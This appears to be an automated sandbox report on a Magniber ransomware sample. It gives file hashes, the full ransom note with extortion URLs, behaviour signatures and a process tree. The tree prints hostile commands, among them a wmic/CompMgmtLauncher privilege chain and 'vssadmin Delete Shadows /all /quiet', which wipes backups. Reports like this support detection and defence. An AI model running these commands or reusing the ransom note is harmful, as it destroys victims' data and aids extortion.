Resubmissions

19-08-2021 01:18

210819-wqg2l69dqn 10

22-07-2021 19:23

210722-87xdtsgz36 10

Analysis

  • max time kernel
    239s
  • max time network
    284s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    22-07-2021 19:23

General

  • Target

    magnibar_0e9cb980e176c55c4694f8cb8b4fad949926887ec9e8ba209058bf22f2b359d6.exe

  • Size

    21KB

  • MD5

    24d60185a9e294a60c03b90fe731a04a

  • SHA1

    c46b6a52efe81e02da8084f197efce7cb482f897

  • SHA256

    0e9cb980e176c55c4694f8cb8b4fad949926887ec9e8ba209058bf22f2b359d6

  • SHA512

    4419eaf48a932c9139c891ee36f51c8a7087357b2de56378a2c3399d8635f90460b30e16dc2b11db704a5f2e702fd116f292f723856b0fca008861eef8302674

Score
10/10

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED!
====================================================================================================
Your files are NOT damaged! Your files are modified only. This modification is reversible.
The only 1 way to decrypt your files is to receive the private key and decryption program.
Any attempts to restore your files with the third party software will be fatal for your files!
====================================================================================================
To receive the private key and decryption program follow the instructions below:
1. Download "Tor Browser" from https://www.torproject.org/ and install it.
2. In the "Tor Browser" open your personal page here:
http://5a94ea1882607ec01yzboiuv.ndkeblzjnpqgpo5o.onion/yzboiuv
Note! This page is available via "Tor Browser" only.
====================================================================================================
Also you can use temporary addresses on your personal page without using "Tor Browser":
http://5a94ea1882607ec01yzboiuv.lieedge.casa/yzboiuv
http://5a94ea1882607ec01yzboiuv.wonride.site/yzboiuv
http://5a94ea1882607ec01yzboiuv.lognear.xyz/yzboiuv
http://5a94ea1882607ec01yzboiuv.bejoin.space/yzboiuv
Note! These are temporary addresses! They will be available for a limited amount of time!
URLs

http://5a94ea1882607ec01yzboiuv.ndkeblzjnpqgpo5o.onion/yzboiuv

http://5a94ea1882607ec01yzboiuv.lieedge.casa/yzboiuv

http://5a94ea1882607ec01yzboiuv.wonride.site/yzboiuv

http://5a94ea1882607ec01yzboiuv.lognear.xyz/yzboiuv

http://5a94ea1882607ec01yzboiuv.bejoin.space/yzboiuv

Signatures

  • Magniber Ransomware

    Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.

  • Process spawned unexpected child process 8 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies extensions of user files 6 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Suspicious use of SetThreadContext 4 IoCs
  • Interacts with shadow copies 2 TTPs 4 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
  • Modifies registry class 11 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 61 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1192
    • C:\Users\Admin\AppData\Local\Temp\magnibar_0e9cb980e176c55c4694f8cb8b4fad949926887ec9e8ba209058bf22f2b359d6.exe
      "C:\Users\Admin\AppData\Local\Temp\magnibar_0e9cb980e176c55c4694f8cb8b4fad949926887ec9e8ba209058bf22f2b359d6.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:368
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1804
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          4⤵
            PID:1960
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:268
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:288
    • C:\Windows\system32\Dwm.exe
      "C:\Windows\system32\Dwm.exe"
      1⤵
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:1160
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1704
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:572
    • C:\Windows\system32\taskhost.exe
      "taskhost.exe"
      1⤵
      • Modifies extensions of user files
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:1088
      • C:\Windows\system32\notepad.exe
        notepad.exe C:\Users\Public\readme.txt
        2⤵
        • Opens file in notepad (likely ransom note)
        PID:1936
      • C:\Windows\system32\cmd.exe
        cmd /c "start http://5a94ea1882607ec01yzboiuv.lieedge.casa/yzboiuv^&1^&36525374^&72^&335^&12"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1148
        • C:\Program Files\Internet Explorer\iexplore.exe
          "C:\Program Files\Internet Explorer\iexplore.exe" http://5a94ea1882607ec01yzboiuv.lieedge.casa/yzboiuv&1&36525374&72&335&12
          3⤵
          • Modifies Internet Explorer settings
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:2020
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2020 CREDAT:275457 /prefetch:2
            4⤵
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            PID:2032
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1892
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1652
    • C:\Windows\system32\cmd.exe
      cmd /c CompMgmtLauncher.exe
      1⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:900
      • C:\Windows\system32\CompMgmtLauncher.exe
        CompMgmtLauncher.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2164
        • C:\Windows\system32\wbem\wmic.exe
          "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
          3⤵
            PID:2320
      • C:\Windows\system32\cmd.exe
        cmd /c CompMgmtLauncher.exe
        1⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:952
        • C:\Windows\system32\CompMgmtLauncher.exe
          CompMgmtLauncher.exe
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2132
          • C:\Windows\system32\wbem\wmic.exe
            "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
            3⤵
              PID:2332
        • C:\Windows\system32\cmd.exe
          cmd /c CompMgmtLauncher.exe
          1⤵
          • Process spawned unexpected child process
          • Suspicious use of WriteProcessMemory
          PID:1016
          • C:\Windows\system32\CompMgmtLauncher.exe
            CompMgmtLauncher.exe
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:2180
            • C:\Windows\system32\wbem\wmic.exe
              "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
              3⤵
                PID:2308
          • C:\Windows\system32\cmd.exe
            cmd /c CompMgmtLauncher.exe
            1⤵
            • Process spawned unexpected child process
            • Suspicious use of WriteProcessMemory
            PID:1140
            • C:\Windows\system32\CompMgmtLauncher.exe
              CompMgmtLauncher.exe
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:2100
              • C:\Windows\system32\wbem\wmic.exe
                "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                3⤵
                  PID:2296
            • C:\Windows\system32\vssadmin.exe
              vssadmin.exe Delete Shadows /all /quiet
              1⤵
              • Process spawned unexpected child process
              • Interacts with shadow copies
              PID:2520
            • C:\Windows\system32\vssadmin.exe
              vssadmin.exe Delete Shadows /all /quiet
              1⤵
              • Process spawned unexpected child process
              • Interacts with shadow copies
              PID:2512
            • C:\Windows\system32\vssadmin.exe
              vssadmin.exe Delete Shadows /all /quiet
              1⤵
              • Process spawned unexpected child process
              • Interacts with shadow copies
              PID:2556
            • C:\Windows\system32\vssadmin.exe
              vssadmin.exe Delete Shadows /all /quiet
              1⤵
              • Process spawned unexpected child process
              • Interacts with shadow copies
              PID:2564
            • C:\Windows\system32\vssvc.exe
              C:\Windows\system32\vssvc.exe
              1⤵
                PID:2664

Network

MITRE ATT&CK Enterprise v6

Downloads

              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\MH2UK1FZ.txt

                MD5

                ab78f7d3961f360fa0f89332122e08cc

                SHA1

                94a4ad29d4a25e79257a2c4d2bbdabae639282b1

                SHA256

                e66bf5f4abf1668ea8bf397a9c971d1f4653c3a8c85a93c43b8ed973f5a6e092

                SHA512

                b3b4986ed0f0b28faee89ed2e3db575819e0c3cbcde2621d60850f753f74c712d17f2bb2d2dedb33875d1da6120552d7cb3b7287c98650cb099453894590d82d

              • C:\Users\Admin\Desktop\ClearRequest.rtf.yzboiuv

                MD5

                b10a629252d2d55f55be9f01e8942e94

                SHA1

                c1366cbe11eb692114914398f993dc4a9829d105

                SHA256

                7e60b8679b13c5112c1a14cda9b8e7b8e5c47a02465180f3fedc3ea17f0a35d1

                SHA512

                6c4f7f77c4874bc8a9e45c0b27b536bf6f7967426e9df5ba1b7ee7ec4b89935011602ce707e80e1c48a6812ea162e4cbb9c2cda331156c726c478690d324d1ae

              • C:\Users\Admin\Desktop\CloseMount.pdf.yzboiuv

                MD5

                93960ac4711e7392a24508349d4cd477

                SHA1

                065774f23950b86feb4718970a484eed31924703

                SHA256

                1bad173521f3197a85e37a85fd64c1104712fd805da6b97b385b3e65eef07dbc

                SHA512

                cde1c0b92b0abf0dd9df5b7ca03fdbaf127653492ade0cf8e21e9839a7f81eb93786ef485cfad72e035732b3a42bf652011200c68e47568d1e8f14cc9850bef8

              • C:\Users\Admin\Desktop\CompressReset.vb.yzboiuv

                MD5

                e54bffda6a66e89276fa68a776c06671

                SHA1

                9453415755f790ece7baf4c6746ae173d03fa34e

                SHA256

                c4cbd7e4b8f3b4b8ddbd932ac1ea4b065c2adba0975a597f5d3e8493f99d04f9

                SHA512

                8f12f027837e691bf593550798a373faae9ec891882b7eb9b9f40d8dea3f9d1318d83122487b7174f69793b25975af365fbdd1b59cb476583ba06f8340b3d252

              • C:\Users\Admin\Desktop\ConnectJoin.xlsm.yzboiuv

                MD5

                3ef71ce6b6e82eec17d350f319ea5990

                SHA1

                aac7a0d6401e425394b8a9b3f15a573571dbc146

                SHA256

                cd8281c9082c8ff229b845748973d27e1b492ef0a87c0bf7e8a25df92ebc795b

                SHA512

                1b053a23e92524ee7670fb12ddebdebdddac7dcf43ca882d171923384abadf507657eb4ef9e08c86ed30a653cbce206896cb12d30b55e20d06faf56b9e7ed534

              • C:\Users\Admin\Desktop\DismountMerge.rle.yzboiuv

                MD5

                3c163d8528b5444e34525169bb8e1489

                SHA1

                1cfa78ccf2a323759b39b3ca5b162f3299ab12d8

                SHA256

                4cbc5de6f4827cc42f74c03b8d7abfa6aa6055946ba48bc6a32baaada83ba6d9

                SHA512

                8e90b5444d02390f28d52106179f8fec24db8de1f251e8719b2bf06c02d565e1c83c261d2cc1788bffff964beaefa3bd55d7b11d45f5c2359e32d1c8cbd4e6be

              • C:\Users\Admin\Desktop\EnterOut.odt.yzboiuv

                MD5

                982f4b0cc21875d5dc1ba2cf2b7522f1

                SHA1

                06c0933c86cff355ba3809dccea05504b71dceb5

                SHA256

                69c8f82772be1ad67af4a1e92ddc8c923d79944fefd70a0f8c0995b0cb21ea58

                SHA512

                3a27d784208743409faa863ba107d50d332e862dba0ed1148b634420918c93c41aa4b85a8003dd09c80f422efd13eee4f4a41413195fc923737855af3a203512

              • C:\Users\Admin\Desktop\NewRestore.raw.yzboiuv

                MD5

                54edd7a93a243a0935fa68b6b80c2a3c

                SHA1

                e823a32088ca61a6642113b6f0be5fc2cf8739b0

                SHA256

                b8b53ec21c805877a5882f25d5fec3b9fda58473fc8a4d22ad45b93c99f1f8be

                SHA512

                91bc3184975c6d0ee68aad3d8ca728e3917c6af127b24bdfc66796845444bdc53e2b46d72da3ab56127088dd3da74cf5526b8f7c1e308aaaa1d52e8cd1692c6e

              • C:\Users\Admin\Desktop\PushInvoke.docm.yzboiuv

                MD5

                6e9aad6a19ba070e6c8f25f948b2f9ca

                SHA1

                5b075bc97d2228c15fdcea5b2acf26ef0e0e178c

                SHA256

                3843e7c7eb9bad0fa5e47c727606dbbda23197dd4fd3b84a982de7df5d1cc786

                SHA512

                4d45f7c4726e61c602c322af1c11e7fb3f34c8a28c0c1ce6450031586c8fab8c98c2c8bb32b357cf209f8dcf7b1eaf9cceffd13a380a79dc711e00d62a56796d

              • C:\Users\Admin\Desktop\RequestRename.asf.yzboiuv

                MD5

                a6ec9588d34143dd95efcd8ef98a537b

                SHA1

                d980b57126ce82c33ef19458c20c8e2b2b05f6ef

                SHA256

                28a0364443e3c2566b018ec42babfd4e60fedfbf6fe1eb1707de6aa5dfd1475e

                SHA512

                f77dc4c9f151867b8be053b8d9999d33f77bda5c5adc1100f867021892c6de33d50369a98900b9963239ea38d47aa7ff226318a95b9cfd85ae44be0781f66541

              • C:\Users\Admin\Desktop\SaveBlock.ppt.yzboiuv

                MD5

                3375464bcf3ade4562ab4cd7f7f012d6

                SHA1

                c43e0c72d5d17e61dfdd9c103c664efdbf98c91c

                SHA256

                38b3759bd497968352ac974b8fb2618d114cd796b6325147fdf7d5e0b74bd4c2

                SHA512

                70767a42231d3ef700129421c601c33c83e75c49d31f2b6e5130c9ac070653fd1425edff5d19a89ffd765ce9c893c450bd48334ed052775454ccefda28e984fe

              • C:\Users\Admin\Desktop\SplitResize.doc.yzboiuv

                MD5

                14f82d43e38e60acf0e5f8afcfb54207

                SHA1

                f2c4cb58bb8f31388a025f1fb5fae5b784cefb45

                SHA256

                5f6bd85824fe83efc845977e94b660a112272c432ba8d1d6e8db1e359fff0d81

                SHA512

                a7a3e6ae7504610f3ba9c4af2c2dc95795f68c89bf7b12be1aa6d54e843ddba99938512bc22af1be875bce4f8b42b9bbe8bbfae4cc29b14b4b00f9057c748e81

              • C:\Users\Admin\Desktop\SubmitMerge.png.yzboiuv

                MD5

                0eafe333d76fcbe4705e7173b3d57341

                SHA1

                76f3f212cbfb27e65536b33ffb18a4cb220b65c3

                SHA256

                489d75cdebc7f99d763562102a431dcdbad5abafde6a866fdc4cfe1321f36e5e

                SHA512

                493177a893a2fa7822357894124fc492342c78488a60ea407726eee584097615bb1b1633728f1c6f525b6c359fcd1eaddafaa993a525d4a06cee06da7f50e5f5

              • C:\Users\Admin\Desktop\readme.txt

                MD5

                543392d5c9e2505d187237ab83377b78

                SHA1

                ac5acf84f166641aaadcaa34db68d3ce514e82d6

                SHA256

                24cae8568317afef80adbb87fe210795b107b5fb3eccfaa50aff210a2d732dde

                SHA512

                dded4b83ea87c19e906f65a257a8d991f6d0d6c4d83cf151e5a3ff0a40cb758448831fa0582c4d2cfc51a0625d6bcf3ae3d57eef6c9fc1c3717f43e4dfd7bf62

              • C:\Users\Public\readme.txt

                MD5

                543392d5c9e2505d187237ab83377b78

                SHA1

                ac5acf84f166641aaadcaa34db68d3ce514e82d6

                SHA256

                24cae8568317afef80adbb87fe210795b107b5fb3eccfaa50aff210a2d732dde

                SHA512

                dded4b83ea87c19e906f65a257a8d991f6d0d6c4d83cf151e5a3ff0a40cb758448831fa0582c4d2cfc51a0625d6bcf3ae3d57eef6c9fc1c3717f43e4dfd7bf62

              • memory/268-84-0x0000000000000000-mapping.dmp

              • memory/288-87-0x0000000000000000-mapping.dmp

              • memory/368-60-0x00000000002E0000-0x00000000002E1000-memory.dmp

                Filesize

                4KB

              • memory/368-59-0x0000000000020000-0x0000000000025000-memory.dmp

                Filesize

                20KB

              • memory/572-85-0x0000000000000000-mapping.dmp

              • memory/1148-65-0x0000000000000000-mapping.dmp

              • memory/1192-61-0x0000000002B40000-0x0000000002B50000-memory.dmp

                Filesize

                64KB

              • memory/1652-68-0x0000000000000000-mapping.dmp

              • memory/1704-69-0x0000000000000000-mapping.dmp

              • memory/1804-86-0x0000000000000000-mapping.dmp

              • memory/1892-66-0x0000000000000000-mapping.dmp

              • memory/1936-62-0x0000000000000000-mapping.dmp

              • memory/1936-63-0x000007FEFC0C1000-0x000007FEFC0C3000-memory.dmp

                Filesize

                8KB

              • memory/1960-88-0x0000000000000000-mapping.dmp

              • memory/2020-70-0x0000000000000000-mapping.dmp

              • memory/2032-89-0x0000000000000000-mapping.dmp

              • memory/2100-90-0x0000000000000000-mapping.dmp

              • memory/2132-91-0x0000000000000000-mapping.dmp

              • memory/2164-93-0x0000000000000000-mapping.dmp

              • memory/2180-94-0x0000000000000000-mapping.dmp

              • memory/2296-98-0x0000000000000000-mapping.dmp

              • memory/2308-99-0x0000000000000000-mapping.dmp

              • memory/2320-100-0x0000000000000000-mapping.dmp

              • memory/2332-101-0x0000000000000000-mapping.dmp